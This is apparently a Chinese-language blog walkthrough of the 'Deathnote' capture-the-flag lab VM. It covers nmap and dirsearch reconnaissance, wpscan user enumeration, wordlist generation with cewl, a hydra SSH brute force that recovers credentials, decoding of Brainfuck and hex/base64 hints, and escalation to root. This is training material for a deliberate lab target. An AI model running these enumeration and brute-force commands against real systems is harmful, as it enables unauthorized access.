Deathnote解题过程

  1. 主机扫描,发现192.168.1.194
    arp-scan -l

  2. 端口扫描,发现80和22端口
    nmap -sS 192.168.1.194

  3. 访问80端口发现自动跳转到http://deathnote.vuln/wordpress添加绑定地址就可以访问了
    vim /etc/hosts
    192.168.1.194		deathnote.vuln

    访问发现并没有什么东西

 4.目录扫描,发现robots.txt和wordpress/wp-login.php 可以访问

dirsearch -u http://192.168.1.194

5.robots.txt没看出有什么用

6.访问wordpress/wp-login.php发现是一个登录页面

使用wpscan进行用户扫描,发现用户kira

wpscan --url http://deathnote.vuln/wordpress/ --enumerate u

 

使用cewl命令爬取页面信息生成字典

cewl http://deathnote.vuln/wordpress/ -w Dnote.txt

 

使用wpscan进行爆破,但是没爆破出来

wpscan --url http://deathnote.vuln/wordpress/ --usernames kira --passwords Dnote.txt

 

7.继续进行目录扫描

dirsearch -u http://deathnote.vuln/wordpress/

发现许多可以访问的目录,但是一个一个试,发现就wp-content/uploads/目录有用

8.访问http://deathnote.vuln/wordpress/wp-content/uploads/下的2021文件夹,进入07文件夹,找到notes.txt和user.txt。

查看发现就是账号和密码。

 

 

9.将其下载到kali

curl http://deathnote.vuln/wordpress/wp-content/uploads/2021/07/notes.txt >  notes.txt

curl http://deathnote.vuln/wordpress/wp-content/uploads/2021/07/user.txt >  user.txt

使用wpscan进行爆破还是没用,这里就用hybra进行ssh远程连接爆破了

hydra -L user.txt -P notes.txt ssh://192.168.1.194

发现了用户l和密码death4me

接着远程连接

ssh l@192.168.1.192

连接上后发现有个user.txt文件,查看后又是某种加密

使用brainfuck解密工具进行解密( Brainfuck/OoK加密解密 - Bugku CTF )。得到:i think u got the shell , but you wont be able to kill me -kira( 我想你得到了 shell,但你不能杀了我 —— kira )

(解密网站:https://ctf.bugku.com/tool/brainfuck)

10.继续进行信息收集,发现case.wav文件有内容,一看就是十六进制。

将其进行十六进制解码,再进行base64解码,得到密码。

passwd : kiraisevil

11.毫无疑问这是kira的密码,切换到kira,进行提权结果是root! 

12.拿到权限查看目录下文件,查看root.txt的内容,得到flag 

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值